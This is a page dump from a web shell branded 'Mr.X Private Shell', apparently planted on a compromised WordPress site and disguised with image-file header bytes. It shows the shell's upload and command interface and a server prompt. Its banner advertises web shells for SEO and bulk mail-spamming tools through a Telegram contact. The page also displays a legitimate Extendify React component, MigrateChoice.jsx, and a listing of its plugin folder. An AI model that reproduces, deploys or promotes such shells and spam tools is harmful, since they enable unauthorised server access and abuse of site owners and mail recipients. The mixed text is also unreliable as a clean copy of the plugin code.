����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

fistvdlb@216.73.216.24: ~ $
import { ChoiceBox } from '@auto-launch/components/ChoiceBox';
import { checkIn } from '@auto-launch/functions/insights';
import { sparkles } from '@auto-launch/icons';
import { useEffect } from '@wordpress/element';
import { __ } from '@wordpress/i18n';
import { cloudUpload } from '@wordpress/icons';
import { motion } from 'framer-motion';

const getMigrateSearchUrl = () =>
	`${window.extSharedData.adminUrl}plugin-install.php?tab=search&s=${encodeURIComponent(
		__('migration', 'extendify-local'),
	)}`;

export const MigrateChoice = ({ onBuildNew }) => {
	useEffect(() => {
		checkIn({ stage: 'migrate_screen' });
	}, []);

	return (
		<motion.div
			animate={{ opacity: 1 }}
			exit={{ opacity: 0 }}
			transition={{ duration: 0.4 }}
			className="grid w-full gap-6 sm:mx-auto sm:max-w-xl sm:grid-cols-2 sm:items-start sm:pt-7"
		>
			<ChoiceBox
				icon={cloudUpload}
				buttonLabel={__('Migrate website', 'extendify-local')}
				description={__(
					'Import an existing WordPress website',
					'extendify-local',
				)}
				onClick={() => {
					checkIn({ stage: 'migrate_screen_migrate' });
					window.location.assign(getMigrateSearchUrl());
				}}
			/>
			<ChoiceBox
				icon={sparkles}
				highlight
				badgeLabel={__('Most Popular', 'extendify-local')}
				buttonLabel={__('Build a new website', 'extendify-local')}
				description={__(
					'Create a beautiful website in about a minute',
					'extendify-local',
				)}
				onClick={() => {
					checkIn({ stage: 'migrate_screen_build' });
					onBuildNew();
				}}
			/>
		</motion.div>
	);
};

Filemanager

Name Type Size Permission Actions
ChoiceBox.jsx File 1.64 KB 0644
CreatingSite.jsx File 4.45 KB 0644
DescriptionGathering.jsx File 10.88 KB 0644
ExtendifyCodeConnector.jsx File 2.71 KB 0644
Launch.jsx File 833 B 0644
Logo.jsx File 552 B 0644
MigrateChoice.jsx File 1.53 KB 0644
MovingGradients.jsx File 1.73 KB 0644
NeedsTheme.jsx File 846 B 0644
RestartLaunchModal.jsx File 5.17 KB 0644
ViewportPulse.jsx File 1.28 KB 0644